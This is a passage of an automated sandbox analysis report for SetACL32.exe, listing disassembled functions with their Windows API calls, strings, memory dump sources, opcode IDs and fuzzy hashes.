                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                • API String ID: 1737263090-3371799133
                • Opcode ID: 8b74ea20a9cff8556678376bf53193a31944464f47b401f12ef0a1188af2513c
                • Instruction ID: 2a20713e05d0b34ec98ec933576fbd4e7fbe39e64a97d202e119a35b58a8524f
                • Opcode Fuzzy Hash: 8b74ea20a9cff8556678376bf53193a31944464f47b401f12ef0a1188af2513c
                • Instruction Fuzzy Hash: 8F020570E00248DFEB14EF68CD85BDDB771EF84304F108699E409AB296D779AA84DF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00FA0F61: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00FA0FA9
                • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,?,?,00000008,?,?,?,?,?), ref: 00FA191D
                • GetLastError.KERNEL32(?,?,00000008,?,?,?,?,?), ref: 00FA1927
                • __dosmaperr.LIBCMT ref: 00FA196C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                • String ID: @M)w
                • API String ID: 251514795-1211491014
                • Opcode ID: 5555fd980d497e7f68b33f7aed6b8a7dfef7f50bd3b3b9e077ebc39f75b64870
                • Instruction ID: e0c98cd194da3f07394169e6fe13966a862b2686a01d44200eb9f8e3da143e84
                • Opcode Fuzzy Hash: 5555fd980d497e7f68b33f7aed6b8a7dfef7f50bd3b3b9e077ebc39f75b64870
                • Instruction Fuzzy Hash: A851B2B2E00209AFEF109FA4CC45BEFBBB9FF4A320F1A0555E500AB151D6789D45EB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 00F9D76C
                  • Part of subcall function 00F9D578: __alloca_probe_16.LIBCMT ref: 00F9D5CB
                  • Part of subcall function 00F9D578: __freea.LIBCMT ref: 00F9D62D
                • _free.LIBCMT ref: 00F9D6C2
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • GetLastError.KERNEL32(?,?,00000000,?,00000000), ref: 00F9D6FD
                  • Part of subcall function 00F97FB2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorHeapLast_free$AllocateFree__alloca_probe_16__freea
                • String ID: @M)w
                • API String ID: 948322168-1211491014
                • Opcode ID: 66fa59e8639fff8dcb66a00f90042c6b9bf3b68be6fb16a7f702a2bc8dc5c18d
                • Instruction ID: 5c012e1da991558958b7cfa92acaaddafbb3c8176476076401c3083cf0613e8d
                • Opcode Fuzzy Hash: 66fa59e8639fff8dcb66a00f90042c6b9bf3b68be6fb16a7f702a2bc8dc5c18d
                • Instruction Fuzzy Hash: F8416171D00229ABEF21AF658C41F9A7BB9BF45360F244095F809E7191EA35CD50EB72
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
                • API String ID: 0-2065372476
                • Opcode ID: 522143728f6c35b8cbf888824a6d3ccfee1f5b2ac2902bf1fd5f3af07480d40d
                • Instruction ID: 94b8f641892cdace3f77291a045f00a30bce8956fa86328045e4686dcd1347ac
                • Opcode Fuzzy Hash: 522143728f6c35b8cbf888824a6d3ccfee1f5b2ac2902bf1fd5f3af07480d40d
                • Instruction Fuzzy Hash: 89315F71E00619ABEF26AF99DD85D9EBBF8EB89B10F100066E504D7251D7719F00EB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00F6E5FC
                Strings
                • Operating system error message: , xrefs: 00F6E69D
                • SetACL error message: , xrefs: 00F6E61F
                • SetACL finished with error(s): , xrefs: 00F6E5F4
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: SimpleString::operator=
                • String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
                • API String ID: 356670603-3876775778
                • Opcode ID: 094f4ec287b739206af72fa3e4b00bd8744704ca06a1bc86c6c6323fe36fa52d
                • Instruction ID: 13599f4497f114c79908b45a19b3eac8ca5d2e6340f367a6e3ea4bbba2d46550
                • Opcode Fuzzy Hash: 094f4ec287b739206af72fa3e4b00bd8744704ca06a1bc86c6c6323fe36fa52d
                • Instruction Fuzzy Hash: EE31C531D04648CADF05DFA4C9127EDB7B0AF65308F148198E41577192EB74AB49DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetAclInformation.ADVAPI32(00000000,746D712B,0000000C,00000002,?,?,?,?,00000000), ref: 00F82EE7
                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00F82EF1
                • GetAce.ADVAPI32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00F82F26
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorInformationLast
                • String ID: @M)w
                • API String ID: 3635006208-1211491014
                • Opcode ID: 25fd3ea87f6a48c27caf662fcac852dd3f651eebd408e2e9205c311347891b0e
                • Instruction ID: cc4e43d91b385df40196678e4c0d4d5fd30a81e6867aceea3a5927affb320c4b
                • Opcode Fuzzy Hash: 25fd3ea87f6a48c27caf662fcac852dd3f651eebd408e2e9205c311347891b0e
                • Instruction Fuzzy Hash: D6218E71A0021E9BDB00EFA5DD85BEFBBF8FF09310F00456AE905A7240D770A914EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocErrorLast
                • String ID: @M)w$tss
                • API String ID: 4252645092-3011810122
                • Opcode ID: ac3285ae22d05746404dbe63b62d570a06b2ca4dd3c480f91a98fccb2292d7ee
                • Instruction ID: 7e0f38efecdb80236c7e62f40e9e8a7ec37ec6c2de9814c9c6218cae32ef3be4
                • Opcode Fuzzy Hash: ac3285ae22d05746404dbe63b62d570a06b2ca4dd3c480f91a98fccb2292d7ee
                • Instruction Fuzzy Hash: 7B016BB19047105BC7217B28EC0258BBBD4DF42334F104639FC5883392E7319904BBE2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CloseHandle.KERNEL32(00000000,00000000,00000010,?,00FA460A,00000010,00FC7478,0000000C,00FA46BC,?), ref: 00FA4732
                • GetLastError.KERNEL32(?,00FA460A,00000010,00FC7478,0000000C,00FA46BC,?), ref: 00FA473C
                • __dosmaperr.LIBCMT ref: 00FA4767
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: @M)w
                • API String ID: 2583163307-1211491014
                • Opcode ID: b20e98ceb10a7040ea7804ff3a1d03bc82b7c94aeac8b840db58dd210673bd72
                • Instruction ID: 16927af79c95b5847e50c6394820c177eff96b756e6b5814baf06c0ff70d5cfe
                • Opcode Fuzzy Hash: b20e98ceb10a7040ea7804ff3a1d03bc82b7c94aeac8b840db58dd210673bd72
                • Instruction Fuzzy Hash: F1012BB3E0426816C62027346C4AB7E778D8FD3B30F250149F908871D2DFE9AC81B555
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MapGenericMask.ADVAPI32(?,00120089), ref: 00F89C68
                • MapGenericMask.ADVAPI32(?,00020019), ref: 00F89C8C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: GenericMask
                • String ID: 9$?
                • API String ID: 3675760450-2473970582
                • Opcode ID: 31767bf69fcfda5e149142af2f99b4d6f469a4a7d385510ba9c7cf9f3bb90399
                • Instruction ID: ebccbed02c0d53885a46f9f62469bc6e637b4ebc0a4bcc70717cde6c4dd9d4d4
                • Opcode Fuzzy Hash: 31767bf69fcfda5e149142af2f99b4d6f469a4a7d385510ba9c7cf9f3bb90399
                • Instruction Fuzzy Hash: 6D112E70E0021CDF8F01DFD5EA855EEBBF8EB0C314F50019AE905B7201DB769A589B91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetFilePointerEx.KERNEL32(00000000,?,00000002,00000000,00000000,?,00000000,?,?,?,00FA40B1,00000000,?,00000002,00000000), ref: 00FA403D
                • GetLastError.KERNEL32(?,00FA40B1,00000000,?,00000002,00000000,?,00FA1855,00000000,00000000,00000000,00000002,?,00000000,00000000), ref: 00FA4047
                • __dosmaperr.LIBCMT ref: 00FA404E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastPointer__dosmaperr
                • String ID: @M)w
                • API String ID: 2336955059-1211491014
                • Opcode ID: b28dd0a5b0320a523aaca37e5094e01764af1b8f341a08ac6e294811c2a67f30
                • Instruction ID: a09e2e076b0294c8d6b98befa575e32ebdf9f24864b6282ba744745e57412569
                • Opcode Fuzzy Hash: b28dd0a5b0320a523aaca37e5094e01764af1b8f341a08ac6e294811c2a67f30
                • Instruction Fuzzy Hash: 3D012873B00118ABCF059FA5DC059AE3F2DEBC6330B244208F6119B1D0EA71ED00BB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,00F8CF3F), ref: 00F8DF5C
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F8DF6A
                • SetLastError.KERNEL32(00000000,?,00F8CF3F), ref: 00F8DF73
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$Value___vcrt_
                • String ID: @M)w
                • API String ID: 483936075-1211491014
                • Opcode ID: 5b3808d389ea20ce1f847bf894fd50f994fbe2a83334d2f0820b06b8ac36e237
                • Instruction ID: 06fab655b7a61ad1c535c14823eaa4f2aeadeaa6d59dd9d3a94753d7c364b3b5
                • Opcode Fuzzy Hash: 5b3808d389ea20ce1f847bf894fd50f994fbe2a83334d2f0820b06b8ac36e237
                • Instruction Fuzzy Hash: B7D01272A5411A9A8B106B75FC0E9D937AAFA863323144B35F119C30D0D778A44AF750
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _strrchr
                • String ID:
                • API String ID: 3213747228-0
                • Opcode ID: 8cfee91b874d94bb0ae32828812be3aaa306158111786b4fa842ad49fdcac14d
                • Instruction ID: bf9372e2cefd7d54f8fd4e2c24b2f6a201fd8eb3dd147cd6fb76d3fd2cef4990
                • Opcode Fuzzy Hash: 8cfee91b874d94bb0ae32828812be3aaa306158111786b4fa842ad49fdcac14d
                • Instruction Fuzzy Hash: 0BB14532D006459FEF11CF68D981BAEBBF5EF55310F1981AAE845DB242D7389E01EB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F74BF0: std::locale::_Init.LIBCPMT ref: 00F75AA6
                • RegEnumKeyExW.ADVAPI32 ref: 00F76ACB
                • RegEnumKeyExW.ADVAPI32 ref: 00F76BD2
                • RegCloseKey.ADVAPI32(?), ref: 00F76BFB
                • RegCloseKey.ADVAPI32(?), ref: 00F76C17
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CloseEnum$Initstd::locale::_
                • String ID:
                • API String ID: 557558298-0
                • Opcode ID: 81d413b7d3b32ab90d69c1aad0581d8a3c884315414ff054a07002076833de12
                • Instruction ID: 4f77f3e423197897100fcb99c44011794c9d537b6459d422d14eee68669a97c9
                • Opcode Fuzzy Hash: 81d413b7d3b32ab90d69c1aad0581d8a3c884315414ff054a07002076833de12
                • Instruction Fuzzy Hash: 54A10171E002089FDB14CFA8DC85BDEBBB5FF44304F14821AE809EB291DB74A944DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: 457f504dfffd99d287f1e27ddf86bc5f94e5adcef2e714907a0db2a20d0d2c84
                • Instruction ID: 9a119b9ea7527924dab82f6efd6ab588c0121d6d81e12b3905a09f58ed80ea30
                • Opcode Fuzzy Hash: 457f504dfffd99d287f1e27ddf86bc5f94e5adcef2e714907a0db2a20d0d2c84
                • Instruction Fuzzy Hash: 8C510272A04606EFEB29BF54D845BFA77A4EF00320F24492DE84587291E775EC80FB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsValidSid.ADVAPI32(00F746E3,?,?,?,?,00F746E3,?), ref: 00F878D6
                • IsValidSid.ADVAPI32(00F746E3,?,?,00F746E3,?), ref: 00F878F2
                • GetLengthSid.ADVAPI32(00F746E3,?,?,00F746E3,?), ref: 00F878F9
                • CopySid.ADVAPI32(00F746E3,00000000,00F746E3,00F746E3,?), ref: 00F87918
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$CopyLength_free
                • String ID:
                • API String ID: 2555587749-0
                • Opcode ID: 2f71743a81b7251db3a4d0bf3c133d20c01e2593560af7b8a38591d6ee9a4862
                • Instruction ID: 0e32bc17f9ed7f73bbbc613e45b20893fe72a91a990ac446fe5c3b7704c213d9
                • Opcode Fuzzy Hash: 2f71743a81b7251db3a4d0bf3c133d20c01e2593560af7b8a38591d6ee9a4862
                • Instruction Fuzzy Hash: 9A01B1B2A0522467EF217B65AC84FABBA9CDF42BB0B150036F904DB200E675D801E7F1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsValidSid.ADVAPI32(00000000,00000000,00000000,00F89605,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8783E
                • IsValidSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8784B
                • GetLengthSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F87852
                • CopySid.ADVAPI32(00F897F0,00000000,000C46C7,00F897F0,00F89605,00000000,000000FF), ref: 00F87871
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$CopyLength_free
                • String ID:
                • API String ID: 2555587749-0
                • Opcode ID: 1713b0fbe4d513f1488fd09b782cc7e0c44c19e426be3f77b428092a91ab5a40
                • Instruction ID: aa390b7b1592acc16b829c2c3312b60765b48008a09dceac6dd04d46e09a6f3a
                • Opcode Fuzzy Hash: 1713b0fbe4d513f1488fd09b782cc7e0c44c19e426be3f77b428092a91ab5a40
                • Instruction Fuzzy Hash: 71015EB2B053256BEB106F66AC88B97BB9CAF557A1F244032FA08D7200E775D811D7F0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00FC7820), ref: 00F6A9AB
                • ResetEvent.KERNEL32(?,?), ref: 00F6A9E8
                • ReleaseMutex.KERNEL32(?), ref: 00F6A9F1
                • SetEvent.KERNEL32(?), ref: 00F6A9FA
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Event$MutexObjectReleaseResetSingleWait
                • String ID:
                • API String ID: 2375943032-0
                • Opcode ID: 71128a0be726d260fd6113f5299be3edbd45f4688b3bd28ca35bd73b00e64f77
                • Instruction ID: 4eb6150e07a6cfef13f52ffe59b61f7275dd2831906f2c93f3c3618ef7c1ff53
                • Opcode Fuzzy Hash: 71128a0be726d260fd6113f5299be3edbd45f4688b3bd28ca35bd73b00e64f77
                • Instruction Fuzzy Hash: 640137B0500605DFD7249F21DC18A26BBE4FF06720B10C92EE5AA8B6A1EB71A850EF41
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SleepConditionVariableCS.KERNELBASE(?,00F8B490,00000064), ref: 00F8B516
                • LeaveCriticalSection.KERNEL32(00FCAA14,?,?,00F8B490,00000064,?,00F6769F,00FCB698,00F67269), ref: 00F8B520
                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00F8B490,00000064,?,00F6769F,00FCB698,00F67269), ref: 00F8B531
                • EnterCriticalSection.KERNEL32(00FCAA14,?,00F8B490,00000064,?,00F6769F,00FCB698,00F67269), ref: 00F8B538
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                • String ID:
                • API String ID: 3269011525-0
                • Opcode ID: 539b6c7a63d9946b5830510c2c6616cc8f43c39de9e8d2cfd396a6b68794ba22
                • Instruction ID: 47b6070a21375878d7433f76816241e6ec56d737ed0b2683af214058494c74ec
                • Opcode Fuzzy Hash: 539b6c7a63d9946b5830510c2c6616cc8f43c39de9e8d2cfd396a6b68794ba22
                • Instruction Fuzzy Hash: 80E0927250022CFBCA022F50EE0AF8D3F18EB0AB25B044014F6076627587686910FBE2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 00F96C14
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F96C27
                • _free.LIBCMT ref: 00F96C38
                • _free.LIBCMT ref: 00F96C49
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 48f5bad2e7cdfb24531655f2e183637dfc8c2653a5bea0eb3522200299468b3f
                • Instruction ID: d0cbfa8e48485813d3f969437733dfbba42cae8da63c2cf67f82c3e473e3f8fc
                • Opcode Fuzzy Hash: 48f5bad2e7cdfb24531655f2e183637dfc8c2653a5bea0eb3522200299468b3f
                • Instruction Fuzzy Hash: 20E046BEC041289A9A122F18BE03C893B25E705742F090406F4009B23ECB39091BFFC0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
